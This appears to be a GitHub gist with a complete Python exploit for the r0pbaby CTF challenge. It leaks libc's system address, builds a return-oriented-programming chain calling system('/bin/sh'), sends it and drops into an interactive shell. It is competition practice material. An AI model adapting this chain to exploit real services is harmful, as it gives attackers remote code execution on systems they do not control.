Skip to content

Instantly share code, notes, and snippets.

@eboda eboda/ropbaby.py

Last active Aug 29, 2015
Embed
What would you like to do?
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
#s = socket.create_connection(("r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me", 10436))
s = socket.create_connection(("127.0.0.1", 13337))
def interact():
t = telnetlib.Telnet()
t.sock = s
t.interact()
def ra(to=.5):
buf = ""
s.setblocking(0)
begin = time.time()
while 1:
if buf is not "" and time.time() - begin > to:
break
elif time.time() - begin > to*2:
break
try:
data = s.recv(4096)
if data:
begin = time.time()
buf += data
else:
time.sleep(.1)
except:
pass
s.setblocking(1)
return buf
def rt(delim):
buf = ""
while delim not in buf:
buf += s.recv(1)
return buf
def se(data):
s.sendall(data)
def u32(d):
return struct.unpack("<I", d)[0]
def u64(d):
return struct.unpack("<Q",d)[0]
def p32(d):
return struct.pack("<I", d)
def p64(d):
return struct.pack("<Q", d)
def rstr(l):
return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(l))
def pwn():
se("2\n")
se("system\n")
rt("system: ")
ans = rt("\n")[:-1]
system = int(ans,16)
base = system - 0x46640
bin_sh_string = base + 0x17ccdb
print "[+] libc @ " , hex(base)
pop_rdi = base + 0x22b1a
rop_chain = "A"*8 + p64(pop_rdi) + p64(bin_sh_string) + p64(system)
# or really simpler with the "one shot"-shell:
# rop_chain = "A"*8 + p64(base + 0xe681d)
se("3\n")
se(str(len(rop_chain)) + "\n")
se(rop_chain + "\n")
ra()
print "[+] shell: "
interact()
pwn()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.